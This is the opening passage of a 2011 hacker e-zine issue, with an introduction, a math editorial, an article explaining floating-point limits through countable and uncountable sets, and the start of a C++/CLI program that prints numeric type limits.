` ` ` ` `
`-sdy+-` `` .sd/` `/ho` `:hdo` `:hd.
``./sdMMMMMMmy+-` .+dy .oNMMMh. `omMMMmo``:y- `/dMMMMm: `/dMMMm.
:hdNMMNdNNMMMMMMMMmhshNMMy +mMMMMMMN. .odNMMMMMMmdN/ `/dNNMMMMMN` `+dMMMMMMm`
/MMMMMm `-+sdNMMMMMMMMMMMy ..:NMMMMMysh/ `+NMMMMMM: :h/`:MMMMMMoomh/hMMMMMMy
/MMMMMm MMMMMM+::::. yMMMMMd: -MMMMMN MMMMMMMy- sMMMMMM-
/MMMMMm MMMMMM- yMMMMM+ MMMMMN MMMMMMs mMMMMM/
/MMMMMm MMMMMM- yMMMMM+ MMMMMN MMMMMMo sMMMMM/
/MMMMMm MMMMMM- yMMMMM+ MMMMMN MMMMMMo yMMMMN`
/MMMMMm MMMMMM- yMMMMM+ MMMMMN MMMMMMo NMMMM:
/MMMMMm MMMMMM- yMMMMM+ MMMMMN MMMMMMo sMMMN-
/MMMMMm MMMMMM- yMMMMM+ MMMMMN MMMMMMo oMMMh.
/MMMMMm `MMMMMM- yMMMMM+ MMMMMN MMMMMMo `yMMh:
/MMMMMN. `hMMMMMM- yMMMMMo MMMMMM MMMMMMo`+NNy-
/MMMMMMNh/.+mdNMMMMMs :mMMMMMN: MMMMMMs./- MMMMMMdmh+`
:yNMMMMMMNNo`-NMMMMMo .hMMMMMMMd. mMMMMMMms. :MMMMMdo.
`/hNMMMh. -mMMMMMy` -yMMMh/` .hMMMmo. :NMNh+.`
`sMm/ .hMMMMMm- -+-` `-o/` `yms/`
-dMy.``` `+NMMMMN. `dh.
`sNMNmmmmmmmdyo/::yMMMd` +M: `.
/mMMMMMMMMMMMMMMMNNmmy/` Go Null Yourself E-Zine :Md:` `omN+
yNNdhyso++oosyhmNNho-` :yhhyssoshdh+`
...` ``..` Issue #6 - Fall/November 2011 ``......`
www.GoNullYourself.org
[==================================================================]
0x01 Introduction
0x02 Editorials
0x03 Floating Point Numbers Suck dan
0x04 duper's Code Corner duper
0x05 How Skynet Works: An Intro to Neural Networks elchupathingy
0x06 Defeating NX/DEP With return-to-libc and ROP storm
0x07 A New Kind of Google Mining Shadytel, Inc
0x08 Stupid Shell Tricks teh crew
0x09 An Introduction to Number Theory dan
0x0a Information Security Careers Cheatsheet Dan Guido
0x0b Interview with Dan Rosenberg (bliss) teh crew
0x0c Et Cetera, Etc. teh crew
[==================================================================]
[==================================================================================================]
-=[ 0x01 Introduction
I wanted to write a dark and emotionally-provocative introduction for this issue. You know, like
the one in Phrack #67.
It's 2.00 a.m., nobody hits this machine at this time of the day.
Logs track me, but I'll clean them. I know this road, I know this feeling,
I recognize the shivering. Turn on the music, the game is on. I'm sure
someone else is around here, someone else has seen this # before.
"I'll fuck you if you don't fuck me first, sir". Fair enough, this
is the rule. I'll go to sleep afterwards. I'm meeting some friends and I've
to take a train tomorrow. I'll sleep on the couch of someone I've never
seen before, yet I know him well.
Yeah, something like that. Too bad I realized I suck at it. Oh well, screw it.
In its place, let's take a look at some of the gems over the past few months from the Twattersphere:
@TeaMp0isoN_ TriCk
u cant say shit to #TeaMp0isoN unless uv read phrack.org & gonullyourself.org/ezines
if u read them, u will then understand #TeaMp0isoN
6 Sep via web
@GregoryDEvans Gregory D. Evans
I can't hear my haters from up here in the Penthouse!
23 Aug via Twitterrific
@attritionorg attrition.org
[19:09] lyger: pro tip: putting chunks of bacon in coffee does not make bacon coffee.
it makes coffee with chunks of fat in it
9 Sep via TweetDeck
@shadytel Shady Tel
For a 35% discount, switch your Shadytel Internet service to Facebook-only today!
21 Sep via TweetDeck
There have also been many lolz to be had over at the Calibre project as of late:
https://bugs.launchpad.net/calibre/+bug/885027
If there's one thing we've learned from this experience, it's that broken designs are okay because
designed to be broken. And humbleness.
Kovid Goyal (kovid) wrote on 2011-11-02: #9
Sarcasm doesn't make me right, being right makes me right. The sarcasm was
just a bonus earned by the sanctimoniusness of the post I was responding to.
Additionally, much was learned about Jon Oberheide being a filthy, filthy troll:
Jon Oberheide (jon-oberheide) wrote 9 hours ago: #33
I'm not sure this is actually exploitable...the posted exploit fails on my GNU/kFreeBSD box:
$ gcc 70calibrerassaultmount.sh -o full-nelson
70calibrerassaultmount.sh: file not recognized: File format not recognized
$ ./full-nelson
-bash: ./full-nelson: No such file or directory
Is there different compiler (icc?) or architecture (maybe needs a RISC arch?) requirement?
Context, people. Context.
Moving on, it seems that one of the more prevalent themes in conference media coverage this year has
certainly been the recruiting of hackers by the federal government. This is most likely due to
presentations given by Mudge (of l0pht fame) promoting Cyber Fast Track, a DARPA initiative that
offers funding and resources for individuals' security projects.
Of course, the average dumbfuck always has something to say about dem h4xx0rs in our g0v3rnm3ntz.
http://www.cbsnews.com/stories/2011/08/06/eveningnews/main20089116.shtml
by Americank17 August 6, 2011 8:48 PM EDT
it shows how backward they are in internet technology! and how desperate they are to
become players in the hackers(idiots)game! These hackers go about scamming and spamming
and dropping viruses all over the internet! This is the most absurd action that these
Feds have taken!
by train99 August 7, 2011 5:47 PM EDT
How are you ever going to eliminate hacking as an illegal activity if you give awards
and jobs to people who do it best?
What a sick, sick country.
by Harden_Tar August 7, 2011 6:14 AM EDT
We are the country that invented the nerd and we should get the best and brightest of
them to go kick China's butt back to the Pentium I days. I don't care if they have blue
and orange hair and a couple dozen facial piercings. Pay them, give them the best gear,
unlimited Skittles, and turn them loose.
Not sure what to say to that... I like Skittles...
Anyways, we've got a good issue this quarter. But don't let us tell you about it.
Just go fucking read it.
Notable Events
==============
July 17, 2011 - Boris Sverdlik publicly burns his CISSP certification
August 4, 2011 - Cyber Fast Track program announced at Blackhat USA 2011
August 28, 2011 - Realization of rogue certificates issued by CA DigiNotar
August 31, 2011 - kernel.org compromised
September 13, 2011 - Microsoft unveils Windows 8
September 21, 2011 - Windows 8 ROP exploit mitigation is defeated
October 5, 2011 - Steve Jobs dies
-=-=-
Now, on to formalities...
If you are interested in submitting content for future issues of GNY Zine, we would be happy to
review it for publication. Content may take many forms, whether it be a paper, review, scan, or
first-hand account of an event. Submissions of ASCII cover art that display the GNY logo in some
way are also appreciated. Well-received topics include computer hacking and exploitation methods,
programming, telephone phreaking (both analog and digital), system and network exploration, hardware
hacking, reverse engineering, amateur radio, cryptography and steganography, and social engineering.
We are also receptive to content relating to concrete subjects such as science and mathematics,
along with more abstract subjects such as psychology and culture. Both technical and non-technical
material is accepted.
Submissions of content, suggestions for and criticisms of the zine, and death threats may be sent
via:
- IRC private message (storm or elchupathingy @ irc.gonullyourself.org #gny)
- Reddit (stormehh @ reddit.com/r/gny)
- Email (zine@gonullyourself.org)
If there is enough feedback, we will publish some of the messages in future issues. Our PGP key is
available for use below.
We have devoted a lot of effort into this publication and hope that you learn something from reading
it. Abiding by our beliefs, any information within this e-zine may be freely re-distributed,
utilized, and referenced elsewhere, but we do ask that you keep the articles fully intact (unless
citing certain passages) and give credit to the original authors when and where necessary.
Go Null Yourself, its staff members, and the authors of GNY Zine are not responsible for any harm or
damage that may result from the information presented within this publication. Although people will
be people and act in idiotic fashions, we do not condone, promote, or participate in illegal
behavior in any way.
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.11 (GNU/Linux)
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
8QJQ4gF00KrsCCSrPyg/cZ5G
=g7oJ
-----END PGP PUBLIC KEY BLOCK-----
[==================================================================================================]
-=[ 0x02 Editorials
We're going to try something different this issue. If you have an opinion and the ability to
coherently piece together nouns and verbs into sentences, then the Editorials section may be for
you. Please consult your doctor before exercising your right to free speech, as this may cause
adverse side-effects.
We may be contacted at: zine@gonullyourself.org
(PGP key is available in the Introduction)
Please note that emails we like will be published in future issues, so specify if you wish for your
message to remain private or if you wish for us to redact certain personal information from it.
----------------------------------------------------------------------------------------------------
[[ Author: dan
[[ IRC: irc.gonullyourself.org #gny
>> Note from GNY Staff:
>> To provide context to this editorial, dan has submitted two mathematics-based articles to this
>> zine issue.
Let's talk:
The number theory article in this issue covers several things you'd learn in the first chapter of a
number theory book. I didn't feel the need to write it because I thought I understood it better
than those books, or because I didn't think you poor starving Internet kids couldn't find access to
this information. Although it is kinda cool to say I'm going to get an article in GNY, I didn't do
it for that reason either. Look here kids, including mathematics articles in this zine (or any
other) is an awesome idea, but we need to be honest with ourselves. We're not going to be
publishing any original research here, so pretty much anything we write will be derivative. So, if
math is a good thing to publish in GNY, but there won't be any new math published, then what's the
point? The point is we can do it differently. We don't have to teach it like old stuffy professors
who bored us to death in school. We can actually attempt to make intuitive sense of things that
otherwise look like gibberish.
Look at Wikipedia's RSA article, or the article on RSA from the last issue. Both, of course, are
very formal. On Wikipedia in their worked RSA example, they compute Phi(p*q) = (p - 1)*(q - 1).
Now that we know what the Phi function is after reading the number theory article, does the above
line make any sense to us? It's using a special trick, p and q are both prime, and there's a
theorem that says the above is true. But we never see that Phi just means all the numbers less than
p*q that are relatively prime to it. This is cool since Wikipedia is supposed to be formal.
Similarly, in the last RSA article we didn't even get an explanation of Euler's Phi function, just a
convoluted (but efficient) way of finding the answer.
The only way we can include mathematics without adding pointlessness to zines is to start trying to
give intuitive, human understandable explanations. The advantage we have over textbooks and working
mathematicians is we don't have to be rigorous, we don't have to be formal. Yeah, those things are
needed, but don't worry, the professionals got that covered. Let's just have fun with it, and try
to actually comprehend what's going on.
So, I threw in an explanation of Inverses in Modular Arithmetic randomly at the very end. That's
because that was the only thing that was missing in explaining to you every mathematical concept you
need to know to see what is going on in RSA.
Of course, actually writing an implementation would require much more efficient algorithms than the
naive ones we'd probably implement after reading this article. Also, notice I said the concepts
going on "in" RSA, not the concepts needed to understand RSA. For that you'd need to learn more
concepts.
There's some old folklore about being a better programmer that involves hitting "s" instead of "n"
while in a debugger. Similarly, to be a better mathematician it's good to step into the theorems
and see what's going on. How deep you want to go depends mainly on your interest. Don't feel bad
if you enjoy learning mathematics without the proofs. Understanding with higher levels of
abstraction is how we advance.
Make math fun, that's original content.
[==================================================================================================]
-=[ 0x03 Floating Point Numbers Suck
-=[ Author: dan
-=[ IRC: irc.gonullyourself.org #gny
On the fact that floating point numbers are stupid, and I hate them.
If you've been a computer programmer for more than a month, chances are you've been bitten by some
sort of error you weren't expecting when using floating point numbers. You probably chalked this up
to rounding error, or took the time to read one of those exceptionally boring articles about things
you should know about floating point numbers. The interesting thing is there is a very theoretical
reason based on pure mathematics that explains why floating point numbers are so stupid, and why we
can't do any better.
Before we can explain why floating point numbers are stupid using math, we first need to learn a few
basic mathematical concepts.
Set: a set is a collection of objects, where each object must be unique. Usually members or
elements of a set are written inside of curly braces.
{1,2,3} is a set, it contains distinct objects.
The integers also form a set, as they contain every positive and negative whole number, as well as
zero.
Sets don't really have to have anything to do with numbers. The collection of every dog on the
planet can also represent a set.
Function: In mathematics, a function, sometimes called a mapping, is a list of rules that associates
an element of one set to another set (or to itself), satisfying the following property: for every
input, there can be only one output.
Here's an example of a function, written in standard mathematical notation.
Let A = {1,2,3}
Let B = {4,5,6}
Let f:A->B such that f(1) = 4, f(2) = 5, f(3) = 6
The notation f:A->B means "f is a function (or mapping) that takes an element of the set A and
associates it with an element of a set B." We then define the rules to tell us which element of A
goes to which element of B. f(1) = 4 means that the element 1 of set A gets mapped to the element 4
of set B.
Mapping, as mentioned above can also be from a set onto itself.
Consider the following:
Let A = {1,2,3}
g:A->A such that g(1) = 3, g(2) = 2, g(3) = 1
This can be interpreted as "g is a mapping that takes an element of the set A and associates it with
an element of the set A." Although we won't discuss it here, the above function is actually a
permutation, a concept used quite a bit in higher mathematics.
Let's do just a few more examples.
Let A = {1,2,3}
Let f:A->A such that f(1) = 1, f(2) = 1, f(3) = 1.
Let g:A->A such that g(1) = 1, g(1) = 2, g(2) = 2, g(3) = 3.
In the above example, f is a function, while g is not. Remember above we said that for something to
be a function, then for every input there must be only one output. Well, look at g, g(1) = 1, and
g(1) = 2. That's two different outputs for one input, so not a function. f is a valid function
since it meets the properties that every input goes to only one output, even thought the output is
the same.
Ok, one final function:
Let N be the set of natural numbers. The natural numbers are sometimes called the counting numbers,
because they contain only the numbers you normally count with. 1,2,3,...
Let f:N->N such that, f(1) = 1, f(2) = 2, f(3) = 3, ...
Another way to write the rules for the above function would be f(x) = x. This function definition
should be understandable to you if you have any experience programming. This function actually has
a special name; it's called the identity function, because it maps each element to itself.
Now, we just need to learn about one special type of function, often called injective functions, or
one-to-one functions. A function is injective if each input goes to a different output. Let's go
back to a previous example.
Let A = {1,2,3}
Let f:A->A such that f(1) = 1, f(2) = 1, f(3) = 1.
While f is a function, with every input going to only one output, it is not an injective function
since each input does not go to a different output.
Let A = {1,2,3}
g:A->A such that g(1) = 3, g(2) = 2, g(3) = 1
This (along with several of our previous examples) would be an injective function.
We're almost ready to learn why floating point numbers are stupid. We just have one more concept we
need to cover.
Countable sets: a set is countable... if you can count the elements inside of it.
The above is the non-mathematical notion of a countable set, and while it's intuitive, it can make
us think about things incorrectly when dealing with infinite sets. So now we're going to talk about
the mathematical definition of a countable set.
Countable sets: a set S is countable if there exist an injective function f:S->N, where N is the
natural numbers. Take a few minutes to think about this. This basically says a set is countable if
there is a function that takes each elements of that set and maps it to the natural numbers (the
counting numbers). It's pretty much a fancy way of saying a set is countable if you can count the
elements inside of it.
The reason the function has to be injective is because, otherwise, you're not really counting
anything. Consider f:A->A, where A = {1,2,3}, such that f(x) = 1.
Then f(1) = 1, f(2) = 1, f(3) = 1. This is a function from a set to the natural numbers, but you
haven't really counted anything. Now if you force the functions to be injective, each output is
unique, so once the output of 1 is used up, it can never appear again.
We can prove that A = {1,2,3} is a countable set by defining an injective function from A to the
natural numbers. Here we go:
Let g:A->N such that g(x) = x.
Then g(1) = 1, g(2) = 2, g(3) = 3. Notice how it seems we actually counted the elements of the set
A. We've also proved that A is a countable set.
Now let's use the same strategy to come up with some mind-bending results about countable sets.
Let N be the set of natural numbers.
Let f:N->N, such that f(x) = x.
So f(1) = 1, f(2) = 2, f(3) = 3,...
So there we have it. Probably not surprising that we can map the natural numbers to the set of
natural numbers easily. The interesting thing here is that this is the first countable set we've
seen that's infinite, often referred to as countably infinite. Yep, we just counted an infinite set
(this is the reason why the intuitive non-mathematical definition can start to fall apart).
Now let's look at the set of integers which we'll call Z. Surely, the integers can't be countable -
I mean there's totally like twice as many of them as there are natural numbers!... Let's find out:
Let f:Z->N, such that
f(0) = 1
f(-1) = 2
f(1) = 3
f(-2) = 4
f(2) = 5
.
.
.
We can see from this that it's possible to make a function that maps the integers to the natural
numbers, meaning the integers are in fact countably infinite. A similar example can be given to
show that the set of rational numbers are countably infinite. This will be omitted since the
description is best described pictorially.
Before we go any further, lets talk about cardinality.
Cardinality: fancy math term to say how big something is, usually described in notation as |A|,
which means "cardinality of a set A." The choice of the same symbols as absolute value is fitting,
since absolute values tell us how big something is. The idea of cardinality is fairly simple for
finite sets.
Let A = {1,2,3}
|A| = 3
Let B = {4,5,6}
|B| = 3
Let C = {1,5,7,9}
|C| = 4
Things get a bit weirder when talking about infinite sets. You see, the mind-bending thing that
happens when you talk about countability is that when you've shown a set is countably infinite,
you've show it is exactly as big as the natural numbers. So, believe it or not, this means from
what we've seen above that there are exactly as many integers as there are natural numbers (and
rationals). Basically, |N| = |Z|. To describe the size (cardinality) of a countably infinite sets,
we say |N| = aleph-null (written in original Hebrew lettering). Some GNY readers might recognize
the name aleph-null as similar to the handle of an author of a very well-known paper in computer
security.
I'll stop with the countable sets now, but just to bend your mind a bit more, you can show that the
even numbers, odd numbers, primes, and many other things are countably infinite, which means they're
exactly the same cardinality as the natural numbers.
So, we're finally getting close to talking about those pesky floating points. Let's begin by
talking about real numbers. The set of real numbers is usually denoted as the set R.
Real numbers are slightly harder to define, but a good basic understanding can be had by saying that
it's the set of all numbers that can be written using decimal notation. 0, 1, 1.1, 2.1234123412341,
-50000.13412341341, 2000, 78 are all examples of real numbers. Floating point numbers are designed
to emulate these numbers; unfortunately, they have some problems with this.
Let's see what the big problem is by trying to count the real numbers.
For them to be countable, we need to find an injective function: f:R->N. Well, let's give it a
shot...
f(0) = 1 ; woo!
f(0.1) = 2, wait or maybe it should be f(.001) = 2, or maybe f(.0001) = 2,
or maybe f(.0000000000000000000000000000000000000000001) = 2.
Maybe you're starting to see the problem here: real numbers have a property that says if you're
given any two real numbers, there's an infinite number of real numbers between them. No matter how
close you pick two real numbers to be, there's always going to be stuff in the middle. We didn't
have this problem with natural numbers or integers. Pick any two integers or natural numbers, and
there's only a finite number of numbers between them. What we have discovered here with real
numbers is our first uncountable set.
Uncountable sets can even make a bit of sense when talking about cardinality. Uncountable sets are
bigger than countably infinite sets. Therefore, |N| < |R|, which is easier for us to wrap our heads
around.
Now, let's talk about some fun facts about uncountable and countable sets. We saw earlier that we
couldn't map the real numbers to the natural numbers; more generally, we can say it's impossible to
create an injective map of a uncountably infinite set to a countably infinite set.
That, in a nutshell, is what's wrong with floating point numbers.
You see, computers represent all of their data using the binary numbering system. You can think of
these binary numbers as integers, or natural numbers - it doesn't really matter. What matters is
that the binary numbers we use to represent things are countable. So, in order for a computer to
represent real numbers, it must come up with a way of mapping real numbers to binary numbers, which
is equivalent to mapping an uncountable set to a countable set: it simply can't be done. For this
reason, it's impossible for us to ever have a completely accurate way of representing real numbers,
so long as we're using binary inside of computers.
Now, think about this. Floating point numbers are mapping some real numbers to the binary digits
our computer uses, which are countable. If one set can map to a countable set, then it is in fact
countable. The only way we could even begin to try and use real numbers on a computer is to limit
ourselves to a subset of the real numbers, and to deal with the "problem" real numbers have. That
problem being that for any two real numbers, there's an infinite number of real numbers between
them. That isn't true for floating point numbers used on computers. Computers have what's referred
to as "machine epsilon," which is the smallest change between two real numbers a computer can
represent using floating points. So, the first floating point could be 0, and the second floating
point could be 2.22045*10^-16, and third floating point could be -2.22045*10^-16, ...
Everything else is ignored.
One solution to the floating point numbers problem would be the use of analog computers (or "real
computers"). Wikipedia briefly explains this concept:
Computer theorists often refer to idealized analog computers as real computers (because they
operate on the set of real numbers). Digital computers, by contrast, must first quantize the
signal into a finite number of values, and so can only work with the rational number set (or,
with an approximation of irrational numbers).
These idealized analog computers may in theory solve problems that are intractable on digital
computers; however as mentioned, in reality, analog computers are far from attaining this ideal,
largely because of noise minimization problems. In theory, ambient noise is limited by quantum
noise (caused by the quantum movements of ions). Ambient noise may be severely reduced - but
never to zero - by using cryogenically cooled parametric amplifiers. Moreover, given unlimited
time and memory, the (ideal) digital computer may also solve real number problems.
- http://en.wikipedia.org/wiki/Analog_computer
---------------------------------------------------------------------------
N, Z, and R are usually represented using blackboard style text. You can
see examples of this in Wikipedia or with LaTeX by using \mathbb{N},
\mathbb{Z}, \mathbb{R}. Similarly, the Hebrew letter Aleph is usually
represent in its original form with a subscript of 0 to represent the
"null" part.
[==================================================================================================]
-=[ 0x04 duper's Code Corner
-=[ Author: duper
-=[ Website: http://projects.ext.haxnet.org/~super/
/******************************************************************************
******************************************************************************/
.^=%=^=%=^=%=^=%=^=%=^=%=^=%=^=%=^=%=^=%=^=%,
= %
% HaXNeT #PrOjECtS PrOdUcTiOnZ PReSeNtS: =
= %
`^=%=^=%=^=%=^=%=^=%=^=%=^=%=^=%=^=%=^=%=^=%'
o Oo o
O oO O
o O o
o o' o
.oOoO O o .oOo. .oOo. `OoOo. .oOo .oOo .oOo. .oOoO .oOo.
o O o O O o OooO' o `Ooo. O O o o O OooO'
O o O o o O O O O o o O O o O
`OoO'o `OoO'o oOoO' `OoO' o `OoO' `OoO' `OoO' `OoO'o `OoO'
O
o'
.oOo .oOo. `OoOo. 'OoOo. .oOo. `OoOo.
O O o o o O OooO' o
o o O O O o O O
`OoO' `OoO' o o O `OoO' o ......
/******************************************************************************
*****************************************************************************/
/******************************************************************************
ISO/IEC 14882:2011 (a.k.a. C++11) is PUBLISHED!! || Can't speak? Identify to NickServ || http:
16:48 -!- killerboy [~mateusz@users69.kollegienet.dk] has joined ##c++
16:48 < Cecen> Yeah, I know VS offers name() and raw_name()
16:49 -!- artiintell [~artiintel@host86-144-19-6.range86-144.btcentralplus.com] has joined ##c++
16:49 < Cecen> I figured raw_name was an extension
16:49 < V-ille> raw_name is an ext.. yep
16:49 < notNicolas> How do you get typeid?
16:49 < Cecen> typeid(something)
16:49 -!- jhunold [~hunold@pD9FD714A.dip.t-dialin.net] has quit [Remote host closed the
connection]
16:49 < V-ille> { struct X {}; cout << typeid(X).name() ; }
16:49 < geordi> main::X
16:49 -!- Neptu [~Neptu@195-67-240-87-no53.tbcn.telia.com] has joined ##c++
16:49 < notNicolas> Cool.
16:50 < notNicolas> Is it a sibling of typeof?
16:50 < V-ille> { struct X {}; X x; cout << typeid(x).name() ; } // alternatively, from a
variable
16:50 < geordi> main::X
16:50 < V-ille> there is no typeof
16:51 -!- mgaunard_ [~mgaunard@2a01:e35:8a4f:ffa0:56e6:fcff:fe93:6b6a] has quit [Ping timeout:
240 seconds]
16:51 < notNicolas> Hmm I thought I saw it at one point.
16:51 < V-ille> typeof is an extension
16:51 < V-ille> found in gcc at least
16:51 -!- MrSassyPants [~DURR@80-218-127-234.dclient.hispeed.ch] has quit [Remote host closed
the connection]
16:51 -!- Blahh_ [Blahh_@86-42-78-19-dynamic.b-ras1.blp.dublin.eircom.net] has joined ##c++
16:52 -!- borisbn [~borisbn@213.138.92.144] has quit [Quit: QIP Infium IRC
protocol->http://forum.qip.ru]
16:52 -!- FrameFever [~Miranda@ppp-93-104-60-55.dynamic.mnet-online.de] has quit [Quit: Miranda
[17:06] [duper`(+Zi)] [2:net/##c++(+CPcflnpt #overflow 777)] [Act: 1] -- more --
[##c++]
*******************************************************************************/
//
// C++/CLI Type Attribute Examiner by duper <super@deathrow.vistech.net> for GNY
//
// Tested in Microsoft Visual Studio 2010 Ultimate on Windows 7 Home Premium SP1
//
#include"stdafx.h" // empty
#include<iostream>
#include<iomanip>
#include<limits>
#include<string>
#include<sstream>
#include<typeinfo>
using namespace std;
using namespace System;
/// <para><summary>This is the prototype declaration for the primary type examination class which
/// does most of the work for this program; particularly the definition of the constructor method:
/// <see cref="TypeExamine::TypeExamine">TypeExamine::TypeExamine</summary>.
/// <remarks>Since the code is written in C++/CLI, it has the ability to examine characteristics of
/// both unmanaged C++0x types and managed type data within the Microsoft .NET Framework's Common
/// Language Runtime.</remarks></para>
template< class T >
class TypeExamine {
public:
TypeExamine();
~TypeExamine();
};
public ref struct CodeConfig {
literal int num_width = 20;
literal int bool_width = 8;
};
template< class T >
TypeExamine<T>::TypeExamine() {
T a;
string typeName = string(typeid(a).name());
CodeConfig codeConfig;
cout << typeName << endl;
cout.setf(ios::left, ios::adjustfield);
cout.unsetf(ios::scientific);
cout << "min: " << setw(codeConfig.num_width) << numeric_limits<T>::min() << ' ';
cout << "max: " << setw(codeConfig.num_width) << numeric_limits<T>::max() << ' ';
cout << "digits: " << setw(codeConfig.num_width) << numeric_limits<T>::digits << endl;
cout << "is_signed: " << setw(codeConfig.bool_width) << numeric_limits<T>::is_signed << ' ';
cout << "is_integer: " << setw(codeConfig.bool_width) << numeric_limits<T>::is_integer << ' ';
cout << "is_exact: " << setw(codeConfig.bool_width) << numeric_limits<T>::is_exact << ' ';
cout << "is_specialized: " << setw(codeConfig.bool_width) << numeric_limits<T>::is_specialized;
cout << endl << endl;
}
template< class T >
TypeExamine<T>::~TypeExamine() {
}
[STAThread]
static int main(array<System::String ^> ^args)
{
TypeExamine<bool> typeExam_bool;
TypeExamine<char> typeExam_char;
TypeExamine<unsigned char> typeExam_uchar;
TypeExamine<wchar_t> typeExam_wchar_t;
TypeExamine<int> typeExam_int;
TypeExamine<unsigned int> typeExam_uint;
TypeExamine<short> typeExam_short;
TypeExamine<unsigned short> typeExam_ushort;
TypeExamine<long> typeExam_long;
TypeExamine<unsigned long> typeExam_ulong;
TypeExamine<float> typeExam_float;
TypeExamine<double> typeExam_double;
TypeExamine<Byte> typeExam_Byte;
TypeExamine<SByte> typeExam_SByte;
TypeExamine<Single> typeExam_Single;
TypeExamine<Char> typeExam_Char;
TypeExamine<Int32> typeExam_Int32;
